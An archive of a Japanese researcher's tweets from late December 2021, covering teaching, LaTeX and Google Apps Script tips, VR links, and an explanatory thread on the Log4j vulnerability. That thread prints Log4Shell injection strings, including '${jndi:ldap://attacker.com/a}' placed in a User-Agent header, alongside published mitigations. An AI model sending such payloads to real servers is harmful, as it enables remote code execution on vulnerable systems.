Tweets at 2021-12-23

講義を受け持っている大学院は学生カルテなりでプロファイルを読み解くこともできるし、学務サポートスタッフがしっかり同席して録画してくれているから助かる部分もあるけど、それがないと先生なんていつだって全裸で歩いているようなもので、怖いです。

衣一枚あるかないかの違いは大きい、感謝。

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021

先生をイジメ殺した自慢ツイートとか見かけると、祈らずにはいられない。

その先生も、学生さんも。

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021

強くなくても優しくはなれる
強者の優しさは普通の優しさ
弱者の優しさは下心
マッチョな強さは自分のため
汗をかく楽しみは自分だけ
本当の強さと優しさは
いろんな痛みがわかる人

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021

この話の前後の乖離と
学校が廃校になったって話
極端な話に見えるけど
多くの場合はその2層の間 https://t.co/KZk5IXd0QF

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021

というわけで
自分は柔軟な学びをサポートすべく、ガチな課題をやりたい人にはガチに、
程よく登山経験の入り口を学びたい人にはそれなりに、という環境やスキルを配慮した合理的な課題設定にします。

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021

note投稿しました。

12/19(日)にIwakenLab.ミートアップを行い、 ゲストに白井博士(@o_ob )来ていただきました。

Iwaken Lab.ミートアップ12月社会人ゲスト:白井博士　XR/メタバース企業のインターンESにチャレンジ｜イワケン @iwaken71 #note https://t.co/VJLm5aAHKj

— イワケン@XR界の吉田松陰 (@iwaken71) December 21, 2021

#Googleで検索できないもの

– 中国のインターネット
– 日本の特許
– おまえが持ってない言葉や概念
– おまえの頭の中
– おまえがやれないこと

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021

Wayback Machineもまだわずか25周年ですねhttps://t.co/In1HK29xnZ

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021

#WhatYouCanNotFindOnGoogle

– Internet in China
– Japanese patents
– Language, words and concepts you don't have
– What's in your head
– Things you have not done

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021

日本語版は冗長性を含めて強めだけど
英語版はちょっとだけ柔らかくしといた

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021

1. Search results of Chinese websites are not optimized. And most Google agents are blocked.
2. J-platpat is greater than Google Patent.
3. No words, no results.
4. You can not describe entire of you.
5. Your things which you can not do, or not yet completed. (=you can do it)

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021

Interesting, 英語もそれなりに綴りが長くて
「いいね！」「それな！」
みたいなのは cool! だったりするので
"興ある"きょうある！とかはいかがでしょう

参考「おもしろい」の語源まとめhttps://t.co/nuzhKF1JjV https://t.co/fV5YhVuREo

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021

「cool!」と心の中で思いながら
「きょぅぁる！」といえば互換性バッチリ

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 22, 2021

おはようございます(眠い)

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

おはようございます
いつも元気でありがとう😊

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

おはようございますにゃー🐱

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

メタバースなC99がはじまる

おきゅえ【A5冊子版】 | まいてぃ屋 https://t.co/SeaoIc2Umg #booth_pm

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

作家さんからの直接の呼びかけ＆
電子版は出ない冊子のみだったので即買い
楽天ポイントも使えるし…

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

昼休みは何食べようかな

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

ドリフト？峠？豆腐店？

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

車内は寒くないけど心は寒くなるやつ…

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

LaTeX初心者に学会テンプレや卒論の書き方、数式、参考文献の集め方ぐらいまでレクチャーして90分以下で教え切ったのですが、これ動画コンテンツで観たい人けこういそうな気がする。

昔こんなBlog書いた、更新したい。https://t.co/aZGYzbVGA6

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

今日新しく学んだこと。

Texのオミクロンは「 o」
他のギリシャ文字のようにバックスラッシュは入らない。これは明らかにヤベーやつ！

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

え、欲しい？

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

今日の発見。
Google Apps ScriptをGoogle Slidesで使っているのですが、ドキュメントを作ったアカウントによって取得できる日付時刻（new Date）が違う。

さてどうやって回避したものか…。#GAS #NoCode pic.twitter.com/bMHY3jEog7

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

解決方法：
Scriptのプロジェクトの設定から
☑「appsscript.json」マニフェスト ファイルをエディタで表示する
デフォルトでは編集できない AppsScript.json が編集できる。ここの
"timeZone": "America/New_York",
↓
"timeZone": "Asia/Tokyo",
として保存して実行しなおせばOK。 pic.twitter.com/5Z0a0QXhAW

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

ちょっと編集する必要があるのでちょっと時間くださいね

ちなみにどんなこと聞きたいとか、リクエストあれば聞いておきたいです

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

インパクトありすぎて中身が頭に入ってこない

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

さっき解説してました！
（録画に残っているかチェックしますが）
基本は
begin{figure}[htbp]
centering
includegraphics[width=linewidth]{fig/filename.png}
caption{絶対書く、何があっても書く}
label{fig:refで使う}
end{figure}

[htbp]はhでいいと思います、hereの略。

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

こんな感じのtips、ベストプラクティスなどを短い時間でお伝えする動画…需要ありそうであればRTかコメントいただけると幸いです。https://t.co/adZFTvs4Xy

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

続きはこちらのスレッドで・・・https://t.co/dGqFMvf8lf

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

#IVRC2021 これはすごい作品だった
IKEPさん詳細情報公開助かる、というか読み応えある…！

「駆け出しだった大学生」がVRコンテストで2作品作って準優勝したお話 – IKEPの制作ブログ https://t.co/CR4EdpmOMJ

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

Overleaf、学生さんなら https://t.co/u1d593GvtG のアドレスで登録しておくと無料でプロ並みアカウントの利用ができる。うまく認定されない場合は一番下のコンタクトで問い合わせてみるといいはず。
あとはIEEE会員なら会費のオファーで利用できる。https://t.co/lV64O4lE9j

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

Three Planets and a Comet via NASA https://t.co/3wFlIhxI6y pic.twitter.com/8A9w6KsDnu

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

むしろRasPi抜きキットで売る時代かも…SDカードが高く売れる

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

TigerHixさんの「AlterEcho」、弊ラボのなかで丁寧に日本語訳しながら読んでたら別メディアから公開されてしまった様子…まあいいか、評価も含めてISMAR2021採択のすばらしい論文。

VTuberの動きをオーバーリアクションに自動変換　中の人の表情などをアニメーションに反映https://t.co/BUgh1J1Vuy https://t.co/3K9IyF9L66

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

これは、すごい…メタバースにタイムマシンが実装されている…（サーバエンジニア向け） https://t.co/rGEoAffT0K

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

タイカレー食べてました

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

オミクロン株とLog4j(CVE-2021-44228)だったらどちらが怖いか…というとどっちも怖いな…
担当者が年末を迎えられるか、年末に誰にも会えないか、という視点では同じなのかもしれないけど（つらい）https://t.co/FO7AbDaFNo pic.twitter.com/59o51rKzJy

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

「年末年始ってのは、サーバメンテとかGithub Pagesのメンテをするシーズンなんですよ。大掃除や年賀状と同じ意味で」って学生に説明しておいた。

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

Log4jにどうしてこんな機能があるのか、どんなコード書いたらこんなことになるのか興味あるな…。

本家https://t.co/7Ye1M2q87A

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

Log4jの脆弱性を検証、NTTデータ先端技術がレポートを発表　～「脆弱性の悪用が可能なことを確認」 https://t.co/353moCnzoB

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

これがテキトーな名前のLDAPサーバにアクセスする前に止めるコードか。
12月5日にApacheのRalph Goersによってテストコードも書かれている。

log4j-core/src/test/java/org/apache/logging/log4j/core/lookup/JndiRestrictedLookupTest.java
孤独な闘いだな…これは。https://t.co/DDTSukJLJk pic.twitter.com/4YvTllCheK

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

このへんか…この応用でいろんな攻撃方法ありそうだな…https://t.co/mlFIEtgzvs pic.twitter.com/dF6W1d8c2v

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

NTTデータさんによると、第2段階（JNDIの不正操作）JNDI Lookupにより、攻撃者のLDAPサーバー他、JNDI Lookupで以下も利用可能か…
・LDAP
・DNS
・RMI
・NDS
・NIS
・CORBA
その先の不正なClassファイルの読み込みによる任意のコード実行を潰したほうがよさそうだけど、それは実装されてないっぽい。

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

JndiLookupを削除するってのは悪くない解決策かもしれんね。まだ感染していないなら。https://t.co/oJcGTxHYSC

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

12/22時点の脆弱性の暫定的な回避策
14日時点で発表された対策は、特定の攻撃に対して不十分であったことがベンダーによって明らかになった。現在は、JndiLookupクラスをクラスパスから削除する対策が推奨。

【続報】IPA、Apache Log4jの脆弱性についての対策を更新https://t.co/bj3SaIpZxr

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

log4jにどうしてこんな機能があるのか？という疑問だったんだけど、いわゆるロガーとしてファイルに保存する以外にAppenderといって、外部のコンピュータにログを保存させる機能があるからなのね。

どうせ使いこなせてないログなら、潰して…と思ったらこれで外部連携とか書いてる地獄があるかもね

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

${jndi:ldap://example.com/file}
こんな感じで広範に使われているjavaのログシステムに、LDAPを介したルックアップを指定することにより、任意のURLを照会させてJavaオブジェクトデータとしてロードできる。#Log4Shellhttps://t.co/HV8D2EG7J0

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

とりあえずlog4j脆弱性の根っこは理解したけど、これって、log4jsとかlog4netとかnpmlogとかにも似たような脆弱性あるのかもしれんね…。

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

ちなみに最初の発見者はAlibaba Cloudのセキュリティチーム Chen Zhaojunさん（2021/11/24）。

これはコロナウイルスの再誕みたいなやつだな…。

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

GoogleがLog4jを脆弱性で影響を受けるであろう500のパッケージについてレポートしている。https://t.co/7GRhDc3ZTR

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

#Log4j 概念コード。
import org.apache.log4j.Logger;
static Logger log = Logger.getLogger(log4jExample.class.getName());

攻撃者は、User-Agentヘッダに
${jndi:ldap://attacker.com/a}
とか悪意の文字列を設定、https://t.co/4nI2uoLixK("Request User Agent:" + userAgent);
を呼べば💀

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

さて、セキュリティ的な影響範囲がわかったので、影響あるIT戦士のみなさまに祈りを捧げつつ、年末年始を尊い開発にささげよう…（頑張って…!!）

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

ブレスだけ別のWAVで保存できるのか…多言語も。Kanru Huaさんの母国語が中国語だから、ってのもすごい。

もはや人間と区別がつかない次元に。多言語で歌う機能も搭載したSynthesizer Vの破壊力 https://t.co/fNDlNEnLRv

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

デジタルハリウッド大学 大学院
テクノロジー特論D(人工現実)第3講
講義録ツイート版いきます
Lecture 3「VR作品企画と体験設計」

まず前回講義の振り返り(一部)。
フィードバックにフィードバックをかけているのですが思考の質がギュン上がりしていて尊い…。#メタバース #メタバース学 #DHGSVR21 pic.twitter.com/y0sPovf8GT

— Dr.(Shirai)Hakase – AICU media編集長 しらいはかせ (@o_ob) December 23, 2021

講義を受け持っている大学院は学生カルテなりでプロファイルを読み解くこともできるし、学務サポートスタッフがしっかり同席して録画してくれているから助かる部分もあるけど、それがないと先生なんていつだって全裸で歩いているようなもので、怖いです。 衣一枚あるかないかの違いは大きい、感謝。 in reply to o_ob

先生をイジメ殺した自慢ツイートとか見かけると、祈らずにはいられない。 その先生も、学生さんも。 in reply to o_ob

強くなくても優しくはなれる 強者の優しさは普通の優しさ 弱者の優しさは下心 マッチョな強さは自分のため 汗をかく楽しみは自分だけ 本当の強さと優しさは いろんな痛みがわかる人 in reply to o_ob

この話の前後の乖離と 学校が廃校になったって話 極端な話に見えるけど 多くの場合はその2層の間 https://t.co/KZk5IXd0QF

というわけで 自分は柔軟な学びをサポートすべく、ガチな課題をやりたい人にはガチに、 程よく登山経験の入り口を学びたい人にはそれなりに、という環境やスキルを配慮した合理的な課題設定にします。 in reply to o_ob

RT @iwaken71: note投稿しました。 12/19(日)にIwakenLab.ミートアップを行い、 ゲストに白井博士(@o_ob )来ていただきました。 Iwaken Lab.ミートアップ12月社会人ゲスト:白井博士　XR/メタバース企業のインターンESにチャ…

#Googleで検索できないもの – 中国のインターネット – 日本の特許 – おまえが持ってない言葉や概念 – おまえの頭の中 – おまえがやれないこと

@CUEICHI Wayback Machineもまだわずか25周年ですね https://t.co/In1HK29xnZ in reply to CUEICHI

#WhatYouCanNotFindOnGoogle – Internet in China – Japanese patents – Language, words and concepts you don't have -… https://t.co/MMZmLGEcXC in reply to o_ob

日本語版は冗長性を含めて強めだけど 英語版はちょっとだけ柔らかくしといた in reply to o_ob

1. Search results of Chinese websites are not optimized. And most Google agents are blocked. 2. J-platpat is greate… https://t.co/RWr89ooSxV in reply to o_ob

Interesting, 英語もそれなりに綴りが長くて 「いいね！」「それな！」 みたいなのは cool! だったりするので "興ある"きょうある！とかはいかがでしょう 参考「おもしろい」の語源まとめ… https://t.co/tWN4iYKsO6

@yknsdt 「cool!」と心の中で思いながら 「きょぅぁる！」といえば互換性バッチリ in reply to yknsdt

おはようございます(眠い)

@decky_vrc おはようございます いつも元気でありがとう😊 in reply to decky_vrc

@Fuwarin おはようございますにゃー🐱 in reply to Fuwarin

メタバースなC99がはじまる おきゅえ【A5冊子版】 | まいてぃ屋 https://t.co/SeaoIc2Umg #booth_pm

作家さんからの直接の呼びかけ＆ 電子版は出ない冊子のみだったので即買い 楽天ポイントも使えるし… in reply to o_ob

昼休みは何食べようかな

@tama_Ud ドリフト？峠？豆腐店？ in reply to tama_Ud

@Juliconyan 車内は寒くないけど心は寒くなるやつ… in reply to Juliconyan

LaTeX初心者に学会テンプレや卒論の書き方、数式、参考文献の集め方ぐらいまでレクチャーして90分以下で教え切ったのですが、これ動画コンテンツで観たい人けこういそうな気がする。 昔こんなBlog書いた、更新したい。 https://t.co/aZGYzbVGA6

今日新しく学んだこと。 Texのオミクロンは「 o」 他のギリシャ文字のようにバックスラッシュは入らない。これは明らかにヤベーやつ！ in reply to o_ob

@yknsdt え、欲しい？ in reply to yknsdt

今日の発見。 Google Apps ScriptをGoogle Slidesで使っているのですが、ドキュメントを作ったアカウントによって取得できる日付時刻（new Date）が違う。 さてどうやって回避したものか…。 #GAS… https://t.co/mfOy9NkueG

解決方法： Scriptのプロジェクトの設定から ☑「appsscript.json」マニフェスト ファイルをエディタで表示する デフォルトでは編集できない AppsScript.json が編集できる。ここの "timeZo… https://t.co/d8N6B5jQU3 in reply to o_ob

@yknsdt ちょっと編集する必要があるのでちょっと時間くださいね ちなみにどんなこと聞きたいとか、リクエストあれば聞いておきたいです in reply to yknsdt

@tama_Ud インパクトありすぎて中身が頭に入ってこない in reply to tama_Ud

@yknsdt さっき解説してました！ （録画に残っているかチェックしますが） 基本は \begin{figure}[htbp] \centering \includegraphics[width=\linewidth]{… https://t.co/eEa6X9TVBj in reply to yknsdt

こんな感じのtips、ベストプラクティスなどを短い時間でお伝えする動画…需要ありそうであればRTかコメントいただけると幸いです。 https://t.co/adZFTvs4Xy in reply to o_ob

@yknsdt 続きはこちらのスレッドで・・・ https://t.co/dGqFMvf8lf in reply to o_ob

#IVRC2021 これはすごい作品だった IKEPさん詳細情報公開助かる、というか読み応えある…！ 「駆け出しだった大学生」がVRコンテストで2作品作って準優勝したお話 – IKEPの制作ブログ https://t.co/CR4EdpmOMJ

Overleaf、学生さんなら https://t.co/u1d593GvtG のアドレスで登録しておくと無料でプロ並みアカウントの利用ができる。うまく認定されない場合は一番下のコンタクトで問い合わせてみるといいはず。 あとはIE… https://t.co/f0WevdJzX7 in reply to o_ob

Three Planets and a Comet via NASA https://t.co/3wFlIhxI6y https://t.co/8A9w6KsDnu

@izm むしろRasPi抜きキットで売る時代かも…SDカードが高く売れる in reply to izm

TigerHixさんの「AlterEcho」、弊ラボのなかで丁寧に日本語訳しながら読んでたら別メディアから公開されてしまった様子…まあいいか、評価も含めてISMAR2021採択のすばらしい論文。 VTuberの動きをオーバーリア… https://t.co/V8Bkx68du8

これは、すごい…メタバースにタイムマシンが実装されている…（サーバエンジニア向け） https://t.co/rGEoAffT0K

@DbsfFcDB7tfd0Tf タイカレー食べてました in reply to DbsfFcDB7tfd0Tf

オミクロン株とLog4j(CVE-2021-44228)だったらどちらが怖いか…というとどっちも怖いな… 担当者が年末を迎えられるか、年末に誰にも会えないか、という視点では同じなのかもしれないけど（つらい）… https://t.co/pHBHSAA9Ig

「年末年始ってのは、サーバメンテとかGithub Pagesのメンテをするシーズンなんですよ。大掃除や年賀状と同じ意味で」って学生に説明しておいた。

Log4jにどうしてこんな機能があるのか、どんなコード書いたらこんなことになるのか興味あるな…。 本家 https://t.co/7Ye1M2q87A in reply to o_ob

Log4jの脆弱性を検証、NTTデータ先端技術がレポートを発表　～「脆弱性の悪用が可能なことを確認」 https://t.co/353moCnzoB in reply to o_ob

これがテキトーな名前のLDAPサーバにアクセスする前に止めるコードか。 12月5日にApacheのRalph Goersによってテストコードも書かれている。 log4j-core/src/test/java/org/apache… https://t.co/E79B34Pe5b in reply to o_ob

このへんか…この応用でいろんな攻撃方法ありそうだな… https://t.co/mlFIEtgzvs https://t.co/dF6W1d8c2v in reply to o_ob

NTTデータさんによると、第2段階（JNDIの不正操作）JNDI Lookupにより、攻撃者のLDAPサーバー他、JNDI Lookupで以下も利用可能か… ・LDAP ・DNS ・RMI ・NDS ・NIS ・CORBA その先… https://t.co/5IGz17CRLb in reply to o_ob

JndiLookupを削除するってのは悪くない解決策かもしれんね。まだ感染していないなら。 https://t.co/oJcGTxHYSC in reply to o_ob

12/22時点の脆弱性の暫定的な回避策 14日時点で発表された対策は、特定の攻撃に対して不十分であったことがベンダーによって明らかになった。現在は、JndiLookupクラスをクラスパスから削除する対策が推奨。 【続報】IPA、… https://t.co/uuY0LxMTse in reply to o_ob

log4jにどうしてこんな機能があるのか？という疑問だったんだけど、いわゆるロガーとしてファイルに保存する以外にAppenderといって、外部のコンピュータにログを保存させる機能があるからなのね。 どうせ使いこなせてないログなら… https://t.co/deuIz3RxoD in reply to o_ob

${jndi:ldap://example.com/file} こんな感じで広範に使われているjavaのログシステムに、LDAPを介したルックアップを指定することにより、任意のURLを照会させてJavaオブジェクトデータとしてロー… https://t.co/8gmVR0bT0I in reply to o_ob

とりあえずlog4j脆弱性の根っこは理解したけど、これって、log4jsとかlog4netとかnpmlogとかにも似たような脆弱性あるのかもしれんね…。 in reply to o_ob

ちなみに最初の発見者はAlibaba Cloudのセキュリティチーム Chen Zhaojunさん（2021/11/24）。 これはコロナウイルスの再誕みたいなやつだな…。 in reply to o_ob

GoogleがLog4jを脆弱性で影響を受けるであろう500のパッケージについてレポートしている。 https://t.co/7GRhDc3ZTR in reply to o_ob

#Log4j 概念コード。 import org.apache.log4j.Logger; static Logger log = Logger.getLogger(log4jExample.class.getName());… https://t.co/lIXMLjT101 in reply to o_ob

さて、セキュリティ的な影響範囲がわかったので、影響あるIT戦士のみなさまに祈りを捧げつつ、年末年始を尊い開発にささげよう…（頑張って…!!）

ブレスだけ別のWAVで保存できるのか…多言語も。Kanru Huaさんの母国語が中国語だから、ってのもすごい。 もはや人間と区別がつかない次元に。多言語で歌う機能も搭載したSynthesizer Vの破壊力 https://t.co/fNDlNEnLRv

デジタルハリウッド大学 大学院 テクノロジー特論D(人工現実)第3講 講義録ツイート版いきます Lecture 3「VR作品企画と体験設計」 まず前回講義の振り返り(一部)。 フィードバックにフィードバックをかけているのですが思… https://t.co/aMfTlLZppA